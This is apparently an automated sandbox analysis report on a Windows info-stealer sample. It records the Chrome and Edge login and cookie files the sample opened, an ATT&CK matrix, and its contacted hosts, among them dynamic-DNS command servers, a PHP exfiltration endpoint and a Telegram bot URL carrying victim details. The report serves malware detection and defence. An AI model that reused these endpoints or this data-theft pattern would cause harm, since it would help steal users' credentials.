                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Users\user\Desktop\kP8EgMorTr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.52d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.52d0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.52d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: kP8EgMorTr.exe PID: 7432, type: MEMORYSTR
ATT&CK matrix, listed one tactic per line (a number in parentheses is the hit count the matrix shows beside that technique; techniques without a number are unmatched placeholders):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (13); System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Email Collection (1); Archive Collected Data (11); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Source | Detection | Scanner | Label
kP8EgMorTr.exe | 36% | Virustotal |
kP8EgMorTr.exe | 39% | ReversingLabs | Win32.Dropper.Generic
kP8EgMorTr.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | false | none | high
api.telegram.org | 149.154.167.220 | true | false | none | high
checkip.dyndns.com | 132.226.8.169 | true | false | none | high
checkip.dyndns.org | unknown | unknown | false | none | high

Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | none | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | none | high
http://checkip.dyndns.org/ | false | none | high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabkP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icokP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lBkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enkP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://aborters.duckdns.org:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.omdbapi.com/?t=)&y=&plot=long&r=jsonkP8EgMorTr.exefalse
                                                                    high
                                                                    http://anotherarmy.dns.army:8081kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchkP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/qkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enlBkP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003482000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$kP8EgMorTr.exe, 00000003.00000002.3699670660.000000000336C000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.orgkP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20akP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedkP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1584668
                                                                                          Start date and time:2025-01-06 07:40:08 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 50s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:15
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:kP8EgMorTr.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 98
                                                                                          • Number of non-executed functions: 26
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 20.12.23.50
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
01:41:04 | API Interceptor | 10690623x Sleep call for process: kP8EgMorTr.exe modified
Match: 132.226.8.169
Associated Sample Name / URL | Detection | Threat Name | Context
PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
PARATRANSFARI REMINDER.exe | malicious | Snake Keylogger | checkip.dyndns.org/
F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
PK241200518-EMAIL RELEASE-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | checkip.dyndns.org/
CITAS_pif.exe | malicious | MassLogger RAT | checkip.dyndns.org/
conferma..exe | malicious | MassLogger RAT | checkip.dyndns.org/

Match: reallyfreegeoip.org
Associated Sample Name / URL | Detection | Threat Name | Context
PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.96.3
W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
PO_B2W984.com | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.67.152
file.exe | malicious | Snake Keylogger | 188.114.96.3
file.exe | malicious | Snake Keylogger | 188.114.97.3
file.exe | malicious | Snake Keylogger | 188.114.96.3
PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 188.114.96.3
image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3

Match: api.telegram.org
Associated Sample Name / URL | Detection | Threat Name | Context
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com | malicious | Unknown | 149.154.167.220
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com | malicious | Unknown | 149.154.167.220
https://telegra.ph/Clarkson-122025-01-02 | malicious | Unknown | 149.154.167.220
W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
mcgen.exe | malicious | Blank Grabber | 149.154.167.220
eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220

Match: checkip.dyndns.com
Associated Sample Name / URL | Detection | Threat Name | Context
PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 158.101.44.242
W2k2NLSvja.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
FACT0987789000900.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                          No context
                                                                                          Process:C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
